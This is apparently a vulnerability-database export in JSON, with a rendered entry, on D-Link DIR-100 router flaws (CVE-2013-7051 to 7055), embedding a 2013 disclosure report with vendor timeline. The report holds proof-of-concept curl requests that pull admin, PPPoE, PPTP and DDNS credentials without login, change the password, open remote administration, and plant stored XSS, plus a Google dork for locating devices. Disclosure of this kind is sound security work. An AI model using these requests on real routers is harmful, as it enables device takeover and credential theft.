            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2013-7051",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "NVD",
            "id": "CVE-2013-7051",
            "trust": 0.8,
            "value": "High"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2014-01475",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202002-038",
            "trust": 0.6,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-01475"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007145"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202002-038"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-7051"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "D-Link DIR-100 4.03B07: cli.cgi security bypass due to failure to check authentication parameters. D-Link DIR-100 Contains an authentication vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. D-Link DIR-100 Ethernet Broadband Router is a broadband router device. The D-Link DIR-100 Ethernet Broadband Router failed to perform an authentication mechanism, allowing remote attackers to exploit the vulnerability to submit requests without verifying the execution of privileged commands. D-Link DIR-100 is prone to the following security vulnerabilities:\n1. An authentication-bypass vulnerability\n2. Multiple information-disclosure vulnerabilities\n3. A cross-site request-forgery vulnerability\n4. A cross-site scripting vulnerability\nAn attacker can exploit these issues to execute HTML and arbitrary  script code in the browser of an unsuspecting user in the context of the  affected device, steal cookie-based authentication credentials,  bypass-authentication mechanism, gain access to potentially sensitive information. Other attacks are also possible. 
* Title: Router D-Link DIR-100 Multiple Vulnerabilities\n* Date: 2013-12-18\n* Author: Felix Richter\n* Contact: root@euer.krebsco.de\n* Vulnerable Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b07_ALL_de_20120410.zip\n* Patched Software:    ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b13_ALL_de_20131011.zip\n* Report Version: 2.0\n* Report URL: http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt\n* Vulnerable: D-Link DIR-100\n    * Hardware Revision: D1\n    * Software Version: 4.03B07 (from 2012-04-10)\n* CVE Numbers: \n    * CWE-287 Authentication Issues:             CVE-2013-7051\n    * CWE-255 Issues with Credential Management: CVE-2013-7052\n    * CWE-352 Cross-Site Request Forgery:        CVE-2013-7053\n    * CWE-79  Cross-Site Scripting:              CVE-2013-7054\n    * CWE-200 Information Disclosure:            CVE-2013-7055\n* Google Dork: \"D-Link Systems\" inurl:bsc_internet.htm D1\n* State: Patched by Vendor\n* Link to Vendor Report: http://more.dlink.de/sicherheit/news.html#news8\n\n# Table of Contents\n\n    1. Background\n    2. Technical Description\n    4. Severity and Remediation\n    5. Timeline\n\n# 1. Background\n\nThe DIR-100 is designed for easy and robust connectivity among heterogeneous\nstandards-based network devices. Computers can communicate directly with this\nrouter for automatic opening and closing of UDP/TCP ports to take full\nadvantage of the security provided without sacrificing functionality of on-line\napplications. 
\n\n# 2 Vulnerability Description\n\nMultiple vulnerabilities have been found in the D-Link DIR-100 Ethernet\nBroadband Router Revision D (and potentially other devices sharing the \naffected firmware) that could allow a remote attacker:\n\n - Retrieve the Administrator password without authentication leading to\n   authentication bypass [CWE-255]\n - Retrieve sensitive configuration paramters like the pppoe username and\n   password without authentication [CWE-200]\n - Execute privileged Commands without authentication through a race\n   condition leading to weak authentication enforcement [CWE-287]\n - Sending formatted request to a victim which then will execute arbitrary\n   commands on the device (CSRF) [CWE-352]\n - Store arbitrary javascript code which will be executed when a victim\n   accesses the administrator interface [CWE-79]\n\nCVE-Numbers for these vulnerabilities has not yet been assigned. \n\n# 3 Technical Description of the Vulnerabilities\n\n## 3.0 The DIR-100 Web Interface and CGI\n\nThe DIR-100 Web interface provides a cgi-script on `/cliget.cgi` for\nunauthenticated users and `/cli.cgi` for authenticated requests. \n\nlist of features provided by each cgi-script can be retrieved by:\n\n    curl \u0027http://192.168.1.104/cliget.cgi?cmd=help\u0027\n    # and respectively when authenticated\n    curl \u0027http://192.168.1.104/cli.cgi?cmd=help\u0027\n\n## 3.1 Authentication Bypass\n\n### Description\n\nThe administrator password is not protected in any way on the device, every\nattacker with access to the administrator interface which listens on port 80. \nFor retrieving the Administrator password the request must not be\nauthenticated. 
\n\n\n### Proof of Concept\n\nThe web interface provides two distinct ways to retrieve the adminstrator\npassword:\n\n    curl \u0027http://192.168.0.1/cliget.cgi?cmd=$sys_user1\u0027\n    curl \u0027http://192.168.0.1/cliget.cgi?cmd=easysetup%20summary\u0027\n\n## 3.2 Weak Authentication\n\n### Description\n\nAs soon as a user is logged into the administration interface, the cli CGI\nis `unlocked` and can be used by without authenticating before as\nthe cgi-script does not check any other authentication parameters such as\ncookies or HTTP Parameters. The only access check is if the IP-Address is \nthe same. \n\n### Proof of Concept\n    \n    # open the router interface in a web browser and log in\n    firefox  \u0027http://192.168.0.1/\u0027 \n    \n    # open a new terminal or another web-browser which is currently not logged\n    # in and try to access\n\n    curl \u0027http://192.168.0.1/cli.cgi?cmd=help\u0027\n\n    # this request will be authenticated and it will not be redirected to the\n    # login page. If no user is logged in, the request will be redirected to\n    # the login \n\n## 3.3 Retrieve sensitive information\n\n### Description\n\nBesides retrieving the administrator password without authentication it is\npossible to retrieve other sensitive configuration from the device as well like\nthe PPTP and poe Username and Password, as well as the configured dyndns\nusername and password and configured mail log credentials when these parameters\nare configured. \nNo authentication is requred. 
\n\n### Proof of Concept\n\n    curl \u0027http://192.168.0.1/cliget.cgi?cmd=$ddns1\u0027\n    curl \u0027http://192.168.0.1/cliget.cgi?cmd=$poe_user\u0027\n    curl \u0027http://192.168.0.1/cliget.cgi?cmd=$poe_pass\u0027\n    curl \u0027http://192.168.0.1/cliget.cgi?cmd=$pptp_user\u0027\n    curl \u0027http://192.168.0.1/cliget.cgi?cmd=$pptp_pass\u0027\n    curl \u0027http://192.168.0.1/cliget.cgi?cmd=$log_mail_user\u0027\n    curl \u0027http://192.168.0.1/cliget.cgi?cmd=$log_mail_pwd\u0027\n\n## 3.4 Cross-Site Request Forgery (CSRF)\n\n### Description\n\nCSRF attacks can be launched by sending a formatted request to a victim, then\ntricking the victim into loading the request (often automatically), which\nmakes it appear that the request came from the victim. As an example the\nattacker could change the administrator password (see Proof of Concept code)\nand enable system remote access. \n\n### Proof of Concept\n\nChanging the password for administrator can be done when the ip-address is\nauthenticated:\n\n    # Log into DIR-100\n    curl -X POST -d \u0027uname=admin\u0026pws=password\u0026login=Login\u0027 \u0027http://192.168.0.1/login.htm\u0027\n\n    # Change password\n    curl \u0027http://192.168.0.1/cli.cgi?cmd=$sys_user1=user=admin\u0026pass=c%;$sys_passHash=4%25;commit\u0027\n\n    # enable remote console\n    curl \u0027http://192.168.0.1/cli.cgi?cmd=$sys_remote_enable=1%25;$sys_remote_ip=0.0.0.0%25;$sys_remote_port=80%25;commit\u0027\n\n## 3.5 Cross-Site Scripting (XSS)\n\n### Description\n\nIt is possible for an authenticated user to store information on the server\nwhich will not be checked on the server side for special characters which\nresults in persistent Cross-Site Scripting Vulnerabilities. With this\nvulnerabilty the victim (administrator) will run javascript code in the \ncontext of the D-Link DIR-100. 
\n\nXSS is possible because only on the client side (javascript code) the input is\nfiltered and validated, sending data directly to the CGI scripts. \n\n### Proof of Concept\n\n    # Log into DIR-100\n    curl -X POST -d \u0027uname=admin\u0026pws=password\u0026login=Login\u0027 \u0027http://192.168.0.1/login.htm\u0027\n\n    #  XSS in Static IP Address Tab\n    curl \u0027http://192.168.1.104/cli.cgi?cmd=dhcps%20set%20name=\u003cscript\u003ealert(1)\u003c/script\u003e%26ip=192.168.0.199%26mac=00:11:22:33:44:55%26flg=1%26exp=\u0027\n\n    # XSS in Scheduler tab\n    curl \u0027http://192.168.1.104/cli.cgi?cmd=$sched2=schen=1%26time=0-60%26day=5%26desc=\u003cscript\u003ealert(1)\u003c/script\u003e%26use=0%26idx=2%26;commit\u0027\n\n# 4 Severity and Remediation\n\nThis exploits are considered very critical, especially when the feature of remote\nadministration is activated on the system.  \nWeak authentication, together with cross-site request forgery and authentication \nbypass can result in a full device compromise from an arbitrary website the victim is\naccessing, even if the device has remote administration deactivated on the\ninternet-port. It is recommended to upgrade the router with the newest firmware\nof the D-Link DIR-100. \n\n# 5 Timeline\n\n2013-09-13 - First Contact with D-Link Support\n2013-09-19 - Sent Report\n2013-10-14 - Request Status update, Response: Beta will be available mid October\n2013-12-02 - Vendor publishes Firmware Update \n2013-12-11 - Request CVE-IDs\n2013-12-18 - Publish the report\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2013-7051"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007145"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2014-01475"
      },
      {
        "db": "BID",
        "id": "65290"
      },
      {
        "db": "PACKETSTORM",
        "id": "125041"
      }
    ],
    "trust": 2.52
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2013-7051",
        "trust": 3.4
      },
      {
        "db": "BID",
        "id": "65290",
        "trust": 2.5
      },
      {
        "db": "EXPLOIT-DB",
        "id": "31425",
        "trust": 1.6
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007145",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2014-01475",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202002-038",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "125041",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-01475"
      },
      {
        "db": "BID",
        "id": "65290"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007145"
      },
      {
        "db": "PACKETSTORM",
        "id": "125041"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202002-038"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-7051"
      }
    ]
  },
  "id": "VAR-202002-0666",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-01475"
      }
    ],
    "trust": 1.6
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "IoT",
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-01475"
      }
    ]
  },
  "last_update_date": "2024-11-23T21:36:11.432000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Top\u00a0Page",
        "trust": 0.8,
        "url": "http://www.dlink.lt/en/"
      },
      {
        "title": "D-Link DIR-100 verifies patches that bypass privileged command execution vulnerabilities",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchInfo/show/44074"
      },
      {
        "title": "D-Link DIR-100 Remediation measures for authorization problem vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=109810"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-01475"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007145"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202002-038"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-287",
        "trust": 1.0
      },
      {
        "problemtype": "Incorrect authentication (CWE-287) [NVD Evaluation ]",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007145"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-7051"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.3,
        "url": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt"
      },
      {
        "trust": 1.6,
        "url": "http://www.exploit-db.com/exploits/31425"
      },
      {
        "trust": 1.6,
        "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90904"
      },
      {
        "trust": 1.6,
        "url": "https://www.securityfocus.com/bid/65290"
      },
      {
        "trust": 1.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-7051"
      },
      {
        "trust": 0.8,
        "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90902"
      },
      {
        "trust": 0.4,
        "url": "http://more.dlink.de/sicherheit/news.html#news8"
      },
      {
        "trust": 0.3,
        "url": "http://www.dlink.com/"
      },
      {
        "trust": 0.3,
        "url": "http://seclists.org/fulldisclosure/2014/feb/4"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.104/cli.cgi?cmd=help\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/cliget.cgi?cmd=$pptp_user\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/cliget.cgi?cmd=$pptp_pass\u0027"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-7052"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/cliget.cgi?cmd=$log_mail_user\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/cli.cgi?cmd=$sys_remote_enable=1%25;$sys_remote_ip=0.0.0.0%25;$sys_remote_port=80%25;commit\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/cliget.cgi?cmd=easysetup%20summary\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/cliget.cgi?cmd=$log_mail_pwd\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.104/cli.cgi?cmd=$sched2=schen=1%26time=0-60%26day=5%26desc=\u003cscript\u003ealert(1)\u003c/script\u003e%26use=0%26idx=2%26;commit\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.104/cliget.cgi?cmd=help\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/cliget.cgi?cmd=$sys_user1\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/login.htm\u0027"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-7053"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.104/cli.cgi?cmd=dhcps%20set%20name=\u003cscript\u003ealert(1)\u003c/script\u003e%26ip=192.168.0.199%26mac=00:11:22:33:44:55%26flg=1%26exp=\u0027"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-7055"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/cliget.cgi?cmd=$poe_user\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/cli.cgi?cmd=$sys_user1=user=admin\u0026pass=c%;$sys_passhash=4%25;commit\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/\u0027"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-7054"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/cliget.cgi?cmd=$poe_pass\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/cliget.cgi?cmd=$ddns1\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/cli.cgi?cmd=help\u0027"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-01475"
      },
      {
        "db": "BID",
        "id": "65290"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007145"
      },
      {
        "db": "PACKETSTORM",
        "id": "125041"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202002-038"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-7051"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-01475"
      },
      {
        "db": "BID",
        "id": "65290"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007145"
      },
      {
        "db": "PACKETSTORM",
        "id": "125041"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202002-038"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-7051"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2014-03-06T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2014-01475"
      },
      {
        "date": "2013-12-03T00:00:00",
        "db": "BID",
        "id": "65290"
      },
      {
        "date": "2020-02-17T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2013-007145"
      },
      {
        "date": "2014-02-03T23:36:22",
        "db": "PACKETSTORM",
        "id": "125041"
      },
      {
        "date": "2020-02-04T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202002-038"
      },
      {
        "date": "2020-02-04T14:15:11.323000",
        "db": "NVD",
        "id": "CVE-2013-7051"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2014-03-06T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2014-01475"
      },
      {
        "date": "2013-12-03T00:00:00",
        "db": "BID",
        "id": "65290"
      },
      {
        "date": "2020-02-17T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2013-007145"
      },
      {
        "date": "2022-07-01T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202002-038"
      },
      {
        "date": "2024-11-21T02:00:14.493000",
        "db": "NVD",
        "id": "CVE-2013-7051"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202002-038"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "D-Link\u00a0DIR-100\u00a0 Vulnerabilities in authentication",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007145"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "authorization issue",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202002-038"
      }
    ],
    "trust": 0.6
  }
}

var-202002-0668
Vulnerability from variot

D-Link DIR-100 contains a cross-site request forgery vulnerability. Information may be obtained or tampered with, and a denial of service (DoS) condition may result. D-Link DIR-100 Ethernet Broadband Router is a broadband router device. D-Link DIR-100 Ethernet Broadband Router has a cross-site request forgery vulnerability that allows remote attackers to build malicious URIs, entice users to open them, and perform malicious operations in the target user context, such as changing administrator passwords. D-Link DIR-100 is prone to the following security vulnerabilities: 1. An authentication-bypass vulnerability 2. Multiple information-disclosure vulnerabilities 3. A cross-site request-forgery vulnerability 4. A cross-site scripting vulnerability An attacker can exploit these issues to execute HTML and arbitrary script code in the browser of an unsuspecting user in the context of the affected device, steal cookie-based authentication credentials, bypass the authentication mechanism, and gain access to potentially sensitive information. Other attacks are also possible.
* Title: Router D-Link DIR-100 Multiple Vulnerabilities * Date: 2013-12-18 * Author: Felix Richter * Contact: root@euer.krebsco.de * Vulnerable Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b07_ALL_de_20120410.zip * Patched Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b13_ALL_de_20131011.zip * Report Version: 2.0 * Report URL: http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt * Vulnerable: D-Link DIR-100 * Hardware Revision: D1 * Software Version: 4.03B07 (from 2012-04-10) * CVE Numbers: * CWE-287 Authentication Issues: CVE-2013-7051 * CWE-255 Issues with Credential Management: CVE-2013-7052 * CWE-352 Cross-Site Request Forgery: CVE-2013-7053 * CWE-79 Cross-Site Scripting: CVE-2013-7054 * CWE-200 Information Disclosure: CVE-2013-7055 * Google Dork: "D-Link Systems" inurl:bsc_internet.htm D1 * State: Patched by Vendor * Link to Vendor Report: http://more.dlink.de/sicherheit/news.html#news8

Table of Contents

1. Background
2. Vulnerability Description
3. Technical Description of the Vulnerabilities
4. Severity and Remediation
5. Timeline

1. Background

The DIR-100 is designed for easy and robust connectivity among heterogeneous standards-based network devices. Computers can communicate directly with this router for automatic opening and closing of UDP/TCP ports to take full advantage of the security provided without sacrificing functionality of on-line applications.

2 Vulnerability Description

Multiple vulnerabilities have been found in the D-Link DIR-100 Ethernet Broadband Router Revision D (and potentially other devices sharing the affected firmware) that could allow a remote attacker to:

  • Retrieve the administrator password without authentication, leading to authentication bypass [CWE-255]
  • Retrieve sensitive configuration parameters, such as the pppoe username and password, without authentication [CWE-200]
  • Execute privileged commands without authentication through a race condition leading to weak authentication enforcement [CWE-287]
  • Send a formatted request to a victim, who will then unknowingly execute arbitrary commands on the device (CSRF) [CWE-352]
  • Store arbitrary javascript code which will be executed when a victim accesses the administrator interface [CWE-79]

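CVE numbers for these vulnerabilities have not yet been assigned. (This sentence appears to predate report version 2.0: the report header lists CVE-2013-7051 through CVE-2013-7055.)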

3 Technical Description of the Vulnerabilities

3.0 The DIR-100 Web Interface and CGI

The DIR-100 Web interface provides a cgi-script on /cliget.cgi for unauthenticated users and /cli.cgi for authenticated requests.

A list of the features provided by each cgi-script can be retrieved with:

curl 'http://192.168.1.104/cliget.cgi?cmd=help'
# and respectively when authenticated
curl 'http://192.168.1.104/cli.cgi?cmd=help'

3.1 Authentication Bypass

Description

The administrator password is not protected in any way on the device: any attacker with access to the administrator interface, which listens on port 80, can retrieve it. The request that retrieves the administrator password does not need to be authenticated.

Proof of Concept

The web interface provides two distinct ways to retrieve the administrator password:

curl 'http://192.168.0.1/cliget.cgi?cmd=$sys_user1'
curl 'http://192.168.0.1/cliget.cgi?cmd=easysetup%20summary'

3.2 Weak Authentication

Description

As soon as a user is logged into the administration interface, the cli CGI is unlocked and can be used without prior authentication, because the cgi-script does not check any other authentication parameters such as cookies or HTTP parameters. The only access check is whether the request comes from the same IP address, so any other client using that address is treated as logged in.

Proof of Concept

# open the router interface in a web browser and log in
firefox  'http://192.168.0.1/'

# open a new terminal or another web-browser which is currently not logged
# in and try to access

curl 'http://192.168.0.1/cli.cgi?cmd=help'

# this request will be authenticated and it will not be redirected to the
# login page. If no user is logged in, the request will be redirected to
# the login

3.3 Retrieve sensitive information

Description

Besides retrieving the administrator password without authentication, it is also possible to retrieve other sensitive configuration from the device, such as the PPTP and poe username and password, the configured dyndns username and password, and the configured mail log credentials, when these parameters are configured. No authentication is required.

Proof of Concept

curl 'http://192.168.0.1/cliget.cgi?cmd=$ddns1'
curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_user'
curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_pass'
curl 'http://192.168.0.1/cliget.cgi?cmd=$pptp_user'
curl 'http://192.168.0.1/cliget.cgi?cmd=$pptp_pass'
curl 'http://192.168.0.1/cliget.cgi?cmd=$log_mail_user'
curl 'http://192.168.0.1/cliget.cgi?cmd=$log_mail_pwd'

3.4 Cross-Site Request Forgery (CSRF)

Description

CSRF attacks can be launched by sending a formatted request to a victim, then tricking the victim into loading the request (often automatically), which makes it appear that the request came from the victim. As an example the attacker could change the administrator password (see Proof of Concept code) and enable system remote access.

Proof of Concept

Changing the password for administrator can be done when the ip-address is authenticated:

# Log into DIR-100
curl -X POST -d 'uname=admin&pws=password&login=Login' 'http://192.168.0.1/login.htm'

# Change password
curl 'http://192.168.0.1/cli.cgi?cmd=$sys_user1=user=admin&pass=c%;$sys_passHash=4%25;commit'

# enable remote console
curl 'http://192.168.0.1/cli.cgi?cmd=$sys_remote_enable=1%25;$sys_remote_ip=0.0.0.0%25;$sys_remote_port=80%25;commit'

3.5 Cross-Site Scripting (XSS)

Description

It is possible for an authenticated user to store information on the server which is not checked on the server side for special characters, which results in persistent cross-site scripting vulnerabilities. With this vulnerability the victim (administrator) will run javascript code in the context of the D-Link DIR-100.

XSS is possible because input is filtered and validated only on the client side (javascript code); data sent directly to the CGI scripts bypasses that filtering.

Proof of Concept

# Log into DIR-100
curl -X POST -d 'uname=admin&pws=password&login=Login' 'http://192.168.0.1/login.htm'

#  XSS in Static IP Address Tab
curl 'http://192.168.1.104/cli.cgi?cmd=dhcps%20set%20name=<script>alert(1)</script>%26ip=192.168.0.199%26mac=00:11:22:33:44:55%26flg=1%26exp='

# XSS in Scheduler tab
curl 'http://192.168.1.104/cli.cgi?cmd=$sched2=schen=1%26time=0-60%26day=5%26desc=<script>alert(1)</script>%26use=0%26idx=2%26;commit'

4 Severity and Remediation

These exploits are considered very critical, especially when the remote administration feature is activated on the system.
Weak authentication, together with cross-site request forgery and authentication bypass, can result in a full device compromise from an arbitrary website the victim is accessing, even if the device has remote administration deactivated on the internet port. It is recommended to upgrade the router to the newest firmware for the D-Link DIR-100; the report header names the 4.03b13 firmware as the patched software.

5 Timeline

2013-09-13 - First Contact with D-Link Support
2013-09-19 - Sent Report
2013-10-14 - Request Status update, Response: Beta will be available mid October
2013-12-02 - Vendor publishes Firmware Update
2013-12-11 - Request CVE-IDs
2013-12-18 - Publish the report



{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202002-0668",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "dir-100",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "4.03b07"
      },
      {
        "model": "dir-100",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dir-100",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "d link",
        "version": "dir-100  firmware  4.03b07"
      },
      {
        "model": "dir-100 ethernet broadband router 4.03b07",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dir-100 4.03b07",
        "scope": null,
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dir-100 4.03b13",
        "scope": "ne",
        "trust": 0.3,
